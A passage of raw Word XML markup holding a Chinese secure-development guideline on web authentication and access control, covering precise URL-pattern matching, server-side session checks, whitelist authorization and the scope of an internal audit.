        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全路径匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRDefault="00CB0C02" w:rsidP="008D6779">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D439F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>梳理并规划</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00ED2573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面及资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将需要登录才能访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与不需要登录就能访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发的应用可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D439F2">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D439F2">
        <w:t>-pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>较精确的模糊</w:t>
      </w:r>
      <w:r w:rsidRPr="00D439F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匹配。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的嵌入式系统可以采用较严格的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径匹配，尽量匹配全路径，而不是只匹配后缀名或文件名。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>应尽量增加上斜杠</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>及目录信息的匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="008F6980" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008F6980">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F6980">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-pattern</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008F6980">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The mapping matches URLs using the following rules:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>matches</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> one character</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>* matches zero or more characters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>** matches zero or more directories in a path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>t?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>st.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches com/test.jsp but also com/tast.jsp or com/txst.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">com/*.jsp </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches all .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> files in the com directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">com/**/test.jsp </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches all test.jsp files underneath the com path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRPr="002C4DCB" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">org/ com/**/*.jsp </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches all .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> files underneath the org/com path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0C02" w:rsidRDefault="00CB0C02" w:rsidP="00CB0C02"/>
    <w:p w:rsidR="00396232" w:rsidRDefault="00396232" w:rsidP="00396232">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置合理</w:t>
      </w:r>
      <w:r w:rsidR="00BF479C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00BD6A33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证白</w:t>
      </w:r>
      <w:r w:rsidR="00BF479C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00396232" w:rsidRDefault="00396232" w:rsidP="00396232">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="008B3B52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3B52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3B52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面及资源做好匿名访问、认证访问区域划分，从访问目录上进行隔离。常见的可匿名访问的资源包括：图片、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等静态文件、系统主页、用户登录页面等。</w:t>
      </w:r>
      <w:r w:rsidR="00C318F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于其他页面资源应谨慎设置认证白名单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5572" w:rsidRDefault="003C5572" w:rsidP="003C5572">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>判断是否已认证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00397447" w:rsidRDefault="00397447" w:rsidP="00397447">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于需要认证才能访问的页面或资源，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00234F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要对请求中的会话信息（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）进行校验，主要的判断有两层：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00397447" w:rsidRDefault="00397447" w:rsidP="00397447">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断请求是否带有会话信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00234F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果没有会话信息则表示该请求未经过认证，需要引导用户重新认证。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5572" w:rsidRPr="003C5572" w:rsidRDefault="00397447" w:rsidP="00397447">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求附带的会话信息（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）在服务端是否合法有效</w:t>
      </w:r>
      <w:r w:rsidR="00234F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果会话信息存在，但不是服务端合法会话，也需要引导用户重新认证。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00056A80" w:rsidRDefault="00056A80" w:rsidP="00056A80">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鉴权</w:t>
      </w:r>
      <w:r w:rsidR="0079171F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096450A" w:rsidRDefault="00A572A2" w:rsidP="0096450A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从服务端获取</w:t>
      </w:r>
      <w:r w:rsidR="0096450A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户身份信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096450A" w:rsidRPr="00B779EE" w:rsidRDefault="0096450A" w:rsidP="0096450A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00B779EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户身份及角色信息保存在服务端会话信息中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，需要做决策的时候从会话信息中获取，不依赖客户端提交的用户身份信息（比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或隐藏域中）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096450A" w:rsidRDefault="0096450A" w:rsidP="0096450A"/>
    <w:p w:rsidR="00A572A2" w:rsidRDefault="00A572A2" w:rsidP="00A572A2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用较精确的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全路径匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A572A2" w:rsidRPr="00A572A2" w:rsidRDefault="00A572A2" w:rsidP="00A572A2">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096450A" w:rsidRDefault="0053041B" w:rsidP="00A572A2">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用白名单鉴权机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053041B" w:rsidRPr="0053041B" w:rsidRDefault="0053041B" w:rsidP="0053041B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐</w:t>
      </w:r>
      <w:r w:rsidRPr="00D70560">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用白名单机制实现权限控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对未找到权限配置的页面及资源，默认禁止访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053041B" w:rsidRPr="0053041B" w:rsidRDefault="0053041B" w:rsidP="0053041B"/>
    <w:p w:rsidR="001723D8" w:rsidRDefault="001723D8" w:rsidP="001723D8">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查范围</w:t>
      </w:r>
      <w:r w:rsidR="00E31127">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001723D8" w:rsidRDefault="001723D8" w:rsidP="00E31127">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="004C22E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>排查范围：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有涉及</w:t>
      </w:r>
      <w:r w:rsidR="00BA47BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00BA47BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00A21380">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自研产品（此次排查不涉及第三方系统）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001723D8" w:rsidRDefault="001723D8" w:rsidP="00E31127">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="004C22E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>排查模块：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00BA47BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的系统认证、用户鉴权、访问控制模块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A63D2" w:rsidRDefault="004C22E0" w:rsidP="00E31127">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="004C22E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
